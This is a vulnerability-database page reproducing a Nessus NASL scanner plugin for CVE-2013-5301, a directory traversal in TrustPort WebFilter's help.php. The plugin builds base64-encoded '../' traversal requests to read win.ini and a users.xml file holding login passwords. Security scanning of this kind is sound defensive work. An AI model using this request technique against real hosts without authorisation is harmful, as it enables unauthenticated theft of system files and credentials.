Lucene search
This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.WEBFILTER_HF_DIR_TRAVERSAL.NASLHistoryAug 13, 2013 - 12:00 a.m.
TrustPort WebFilter help.php hf Parameter Directory Traversal
2013-08-1300:00:00
This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
15
7.8 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:C/I:N/A:N
0.004 Low
EPSS
Percentile
74.1%
The TrustPort WebFilter administration console install listening on this port fails to sanitize user input to the ‘hf’ parameter of the ‘help.php’ script before using it to return the contents of a file.
An unauthenticated, remote attacker can leverage this issue to view arbitrary files on the remote host.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(69321);
script_version("1.12");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_cve_id("CVE-2013-5301");
script_bugtraq_id(61662);
script_xref(name:"EDB-ID", value:"27432");
script_name(english:"TrustPort WebFilter help.php hf Parameter Directory Traversal");
script_summary(english:"Tries to read a local file");
script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts a PHP script that can be abused to
disclose the contents of arbitrary files.");
script_set_attribute(attribute:"description", value:
"The TrustPort WebFilter administration console install listening on
this port fails to sanitize user input to the 'hf' parameter of the
'help.php' script before using it to return the contents of a file.
An unauthenticated, remote attacker can leverage this issue to view
arbitrary files on the remote host.");
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/527826/30/0/threaded");
script_set_attribute(attribute:"solution", value:
"Upgrade to TrustPort WebFilter 6.0.0.3033 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2013-5301");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2013/08/07");
script_set_attribute(attribute:"patch_publication_date", value:"2013/07/30");
script_set_attribute(attribute:"plugin_publication_date", value:"2013/08/13");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:trustport:webfilter");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("http_version.nasl");
script_require_keys("www/PHP");
script_require_ports("Services/www", 4849);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
include("webapp_func.inc");
include("data_protection.inc");
port = get_http_port(default:4849, php:TRUE);
# Unless we're paranoid, make sure the web server looks like
# TrustPort WebFilter's admin console.
if (report_paranoia < 2)
{
res = http_get_cache(port:port, item:"/", exit_on_fail:TRUE);
if (
"http://www.trustport" >!< res &&
"<title>TrustPort Net Gateway</title>" >!< res
) audit(AUDIT_WEB_APP_NOT_INST, 'TrustPort WebFilter', port);
}
files = make_list(
'windows/win.ini',
'winnt/win.ini',
'../databases/users.xml'
);
file_pats = make_array();
file_pats['windows/win.ini'] = "\[[a-zA-Z]+\]|^; for 16-bit app support";
file_pats['winnt/win.ini'] = "\[[a-zA-Z]+\]|^; for 16-bit app support";
file_pats['../databases/users.xml'] = "<LOGINPASS>[^ <]+</LOGINPASS>";
foreach file (files)
{
if ("../" >< file) hf = file;
else hf = mult_str(str:"../", nb:12) + file;
url = "/help.php?hf=" + base64(str:hf);
res = http_send_recv3(port:port, method:"GET", item:url, exit_on_fail:TRUE);
if (
'<body onload="this.focus();">' >< res[2] &&
egrep(pattern:file_pats[file], string:res[2])
)
{
report = NULL;
attach_file = NULL;
output = NULL;
req = http_last_sent_request();
request = NULL;
if (report_verbosity > 0)
{
report =
'\n' + "Nessus was able to obtain the contents of '" + file + "' with the" +
'\n' + 'following request :' +
'\n' +
'\n ' + req +
'\n';
if (report_verbosity > 1)
{
contents = strstr(res[2], "<div>") - "<div>";
contents = contents - strstr(contents, "</div");
contents = ereg_replace(pattern:"^[ \t\r\n]*", replace:"", string:contents);
if (!egrep(pattern:file_pats[file], string:contents)) contents = res[2];
output = data_protection::sanitize_user_full_redaction(output:contents);
attach_file = file;
request = make_list(req);
}
}
security_report_v4(port:port,
extra:report,
severity:SECURITY_HOLE,
request:request,
file:attach_file,
output:output);
exit(0);
}
}
audit(AUDIT_WEB_APP_NOT_AFFECTED, "TrustPort WebFilter", build_url(qs:'/', port:port));
Related
prion
prion
Directory traversal
2013-08-16 17:55:00
nvd
nvd
CVE-2013-5301
2013-08-16 17:55:09
cvelist
cvelist
CVE-2013-5301
2013-08-16 17:00:00
openvas
openvas
cve
cve
CVE-2013-5301
2013-08-16 17:55:09
7.8 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:C/I:N/A:N
0.004 Low
EPSS
Percentile
74.1%
Related for WEBFILTER_HF_DIR_TRAVERSAL.NASL